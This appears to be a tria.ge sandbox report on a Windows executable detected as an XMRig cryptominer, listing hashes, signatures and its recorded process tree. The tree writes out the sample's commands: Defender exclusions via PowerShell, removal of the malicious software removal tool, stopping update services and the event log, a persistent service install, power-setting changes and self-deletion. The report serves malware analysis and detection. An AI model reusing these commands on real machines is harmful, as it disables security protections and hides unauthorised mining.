Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
13/09/2024, 18:42
Static task
static1
Behavioral task
behavioral1
Sample
3f757c5b36c98c6d41b9dc895bea3ed0N.exe
Resource
win7-20240903-en
General
-
Target
3f757c5b36c98c6d41b9dc895bea3ed0N.exe
-
Size
5.3MB
-
MD5
3f757c5b36c98c6d41b9dc895bea3ed0
-
SHA1
37f5feefd63decf474211c351a59e5a48b1d1948
-
SHA256
6bf6387c3201266d96cdc6ab03c1140ac9090bb1300b7de751a0de94309878d2
-
SHA512
5ebfe6f0b289aca5e3a7eedc0458622ed4590a06547f8f18588b178db98a43f03ba9f8cffdf169f0e0ba1e29140e888e84e1a00b2808cc1cfacd990e0fcbeabe
-
SSDEEP
98304:xRjPz9KDzUU8O5/B/LJ25E9SVh86sS3TRknQ3ss2MApp9meypA3cPDu7:xFKoU8O5/b2XViSjX310SeyGc7u7
Malware Config
Signatures
-
XMRig Miner payload 8 IoCs
resource yara_rule behavioral1/memory/2284-39-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-33-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-32-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-38-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-37-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-36-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-35-0x0000000140000000-0x0000000140848000-memory.dmp xmrig behavioral1/memory/2284-40-0x0000000140000000-0x0000000140848000-memory.dmp xmrig -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2688 powershell.exe 1960 powershell.exe -
Creates new service(s) 2 TTPs
-
Deletes itself 1 IoCs
pid Process 2032 cmd.exe -
Executes dropped EXE 2 IoCs
pid Process 472 Process not Found 2832 lutlgidagtja.exe -
Loads dropped DLL 1 IoCs
pid Process 472 Process not Found -
resource yara_rule behavioral1/memory/2284-39-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-28-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-33-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-32-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-31-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-27-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-38-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-37-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-36-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-35-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-30-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-29-0x0000000140000000-0x0000000140848000-memory.dmp upx behavioral1/memory/2284-40-0x0000000140000000-0x0000000140848000-memory.dmp upx -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2980 powercfg.exe 2140 powercfg.exe 2768 powercfg.exe 2780 powercfg.exe 2796 powercfg.exe 2940 powercfg.exe 2628 powercfg.exe 2724 powercfg.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe lutlgidagtja.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe 3f757c5b36c98c6d41b9dc895bea3ed0N.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2832 set thread context of 2964 2832 lutlgidagtja.exe 85 PID 2832 set thread context of 2284 2832 lutlgidagtja.exe 90 -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe -
Launches sc.exe 14 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2884 sc.exe 2924 sc.exe 2760 sc.exe 2456 sc.exe 2820 sc.exe 812 sc.exe 544 sc.exe 1652 sc.exe 2664 sc.exe 2956 sc.exe 2744 sc.exe 2704 sc.exe 2508 sc.exe 1684 sc.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = e084a6c80c06db01 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 1960 powershell.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2668 3f757c5b36c98c6d41b9dc895bea3ed0N.exe 2832 lutlgidagtja.exe 2688 powershell.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2832 lutlgidagtja.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe 2284 nslookup.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 1960 powershell.exe Token: SeShutdownPrivilege 2940 powercfg.exe Token: SeShutdownPrivilege 2796 powercfg.exe Token: SeShutdownPrivilege 2628 powercfg.exe Token: SeShutdownPrivilege 2724 powercfg.exe Token: SeDebugPrivilege 2688 powershell.exe Token: SeShutdownPrivilege 2980 powercfg.exe Token: SeShutdownPrivilege 2140 powercfg.exe Token: SeShutdownPrivilege 2768 powercfg.exe Token: SeLockMemoryPrivilege 2284 nslookup.exe Token: SeShutdownPrivilege 2780 powercfg.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1248 wrote to memory of 2856 1248 cmd.exe 39 PID 1248 wrote to memory of 2856 1248 cmd.exe 39 PID 1248 wrote to memory of 2856 1248 cmd.exe 39 PID 2032 wrote to memory of 1112 2032 cmd.exe 64 PID 2032 wrote to memory of 1112 2032 cmd.exe 64 PID 2032 wrote to memory of 1112 2032 cmd.exe 64 PID 1628 wrote to memory of 348 1628 cmd.exe 73 PID 1628 wrote to memory of 348 1628 cmd.exe 73 PID 1628 wrote to memory of 348 1628 cmd.exe 73 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2964 2832 lutlgidagtja.exe 85 PID 2832 wrote to memory of 2284 2832 lutlgidagtja.exe 90 PID 2832 wrote to memory of 2284 2832 lutlgidagtja.exe 90 PID 2832 wrote to memory of 2284 2832 lutlgidagtja.exe 90 PID 2832 wrote to memory of 2284 2832 lutlgidagtja.exe 90 PID 2832 wrote to memory of 2284 2832 lutlgidagtja.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f757c5b36c98c6d41b9dc895bea3ed0N.exe"C:\Users\Admin\AppData\Local\Temp\3f757c5b36c98c6d41b9dc895bea3ed0N.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:2668 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1960
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1248 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:2856
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:1652
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:2744
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2884
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:2924
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:2704
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2724
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "JIOGRCSG"2⤵
- Launches sc.exe
PID:2760
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "JIOGRCSG" binpath= "C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe" start= "auto"2⤵
- Launches sc.exe
PID:2664
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog2⤵
- Launches sc.exe
PID:2456
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "JIOGRCSG"2⤵
- Launches sc.exe
PID:2508
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\3f757c5b36c98c6d41b9dc895bea3ed0N.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:2032 -
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:1112
-
-
-
C:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exeC:\ProgramData\zvycwxhpsxqt\lutlgidagtja.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2832 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2688
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart2⤵
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart3⤵
- Drops file in Windows directory
PID:348
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc2⤵
- Launches sc.exe
PID:2820
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc2⤵
- Launches sc.exe
PID:812
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv2⤵
- Launches sc.exe
PID:2956
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits2⤵
- Launches sc.exe
PID:544
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc2⤵
- Launches sc.exe
PID:1684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2980
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2140
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\system32\conhost.exeC:\Windows\system32\conhost.exe2⤵PID:2964
-
-
C:\Windows\system32\nslookup.exenslookup.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.3MB
MD53f757c5b36c98c6d41b9dc895bea3ed0
SHA137f5feefd63decf474211c351a59e5a48b1d1948
SHA2566bf6387c3201266d96cdc6ab03c1140ac9090bb1300b7de751a0de94309878d2
SHA5125ebfe6f0b289aca5e3a7eedc0458622ed4590a06547f8f18588b178db98a43f03ba9f8cffdf169f0e0ba1e29140e888e84e1a00b2808cc1cfacd990e0fcbeabe